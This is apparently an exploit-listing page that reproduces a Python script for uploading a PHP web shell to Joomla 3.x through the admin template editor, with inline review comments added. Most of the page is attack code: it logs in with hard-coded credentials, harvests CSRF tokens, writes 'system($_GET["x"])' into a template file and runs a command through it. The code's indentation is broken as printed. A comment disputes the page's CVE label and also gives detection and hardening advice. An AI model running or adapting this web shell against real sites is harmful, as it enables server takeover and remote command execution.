Joomla 3.x Proof Of Concept Shell Upload
CVE
Category
Price
Severity
CVE-2015-8562
CWE-434
$500
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2017-05-31
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017060001 Below is a copy:
Joomla 3.x Proof Of Concept Shell Upload c@kali:~/src/napalm2.2/modules$ cat shell-joomla.py
#!/usr/bin/env python
# joomla_shellup.py - small script to upload shell in Joomla
#
# 02.05.2017, rewritten: 27.05
# -- hint --
# To exploit this "feature" you will need valid credentials.
# Based on latest (3.6.5-1) version.
# Tested also on: 3.7.x
import requests
import re
# Interactive entry point (Python 2 syntax: `raw_input`, `print` statements).
# The value is concatenated straight into URLs below, so it is expected to be
# a full base URL including the scheme.
target = raw_input("[+] Hostname >> ")
print '[+] Checking: ' + str(target)
# initGET
# A single session carries the admin cookie across the login, editor-save
# and probe requests that follow.
session = requests.session()
initlink = target + '/administrator/index.php'
initsend = session.get(initlink)
initresp = initsend.text
# Joomla's form (anti-CSRF) token is rendered as a hidden input whose *name*
# is the token and whose value is "1"; the regex captures that name. Nothing
# else on the page is checked, so any hidden input with value="1" would match.
find_token = re.compile('<input type="hidden" name="(.*?)" value="1"/>')
found_token = re.search(find_token, initresp)
if found_token:
# NOTE(review): the body of this `if` lost its indentation when the page was
# rendered; as printed the script does not parse. Presumably only the next two
# lines were indented in the original, so a missing token is not handled --
# `initToken` would be unbound at the login POST below.
initToken = found_token.group(1)
print '[+] Found init token: ' + initToken
print '[+] Preparing login request'
# Credentials are hard-coded, consistent with the header hint that valid
# credentials are required: this is an authenticated path, not a bypass.
# 'return' is base64 of "index.php".
data_login = {
'username':'user',
'passwd':'bitnami',
'lang':'',
'option':'com_login',
'task':'login',
'return':'aW5kZXgucGhw',
initToken:'1'
}
data_link = initlink
doLogin = session.post(data_link, data=data_login)
loginResp = doLogin.text
# The login response is never inspected (`loginResp` is unused), so a
# rejected login is not detected here; it only surfaces later when the
# editor page yields no token.
print '[+] At this stage we should be logged-in as an admin :)'
# Template editor page. id=503 is a hard-coded extension id (it resolves to
# the beez3 template, judging by the probe path near the end), and `file` is
# base64 of "/jsstrings.php".
uplink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
filename = 'jsstrings.php'
print '[+] File to change: ' + str(filename)
# The editor form carries its own token; grab it the same way as above.
getnewtoken = session.get(uplink)
getresptoken = getnewtoken.text
newToken = re.compile('<input type="hidden" name="(.*?)" value="1"/>')
newFound = re.search(newToken, getresptoken)
if newFound:
# NOTE(review): same lost indentation as the first `if`; `newOneTok` is
# unbound below if the editor page returned no token (e.g. login failed).
newOneTok = newFound.group(1)
print '[+] Grabbing new token from logged-in user: ' + newOneTok
# Second fetch of the same editor page; the response is unused (the debug
# print below is commented out), so these three lines are dead code.
getjs = target+'/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
getjsreq = session.get(getjs)
getjsresp = getjsreq.text
# print getjsresp
print '[+] Shellname: ' + filename
shlink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA='
# `task=template.apply` is the stock admin template-editor save: whatever is
# in jform[source] is written as the file's contents. No parser or upload
# flaw is involved -- the risk is that an admin session can write PHP into
# the web root through a supported feature.
# Defender's view: this POST is the event to alarm on (a com_templates save
# whose body contains "<?php", from an automated client), and a new or
# modified .php file under templates/ is the on-disk artefact. Disabling
# template/file editing on production sites and file-integrity monitoring
# of the templates directory close this path; the credentials themselves
# are the precondition.
# NOTE(review): because the script depends on a valid admin login, it is
# post-authentication template editing, which does not appear to match the
# unauthenticated issue this page is filed under (CVE-2015-8562) -- confirm
# the CVE mapping.
shdata_up = {
'jform[source]':'<?php system($_GET["x"]);',
'task':'template.apply',
newOneTok:'1',
'jform[extension_id]':'503',
'jform[filename]':'/'+filename
}
shreq = session.post(shlink, data=shdata_up)
# Probe the written file and print whatever the server returns; the save
# response itself (`shreq` above) is not checked.
path2shell = '/templates/beez3/jsstrings.php?x=id'
print '[+] Shell is ready to use: ' + str(path2shell)
print '[+] Checking:'
shreq = session.get(target + path2shell)
shresp = shreq.text
print shresp
print '\n[+] Module finished.'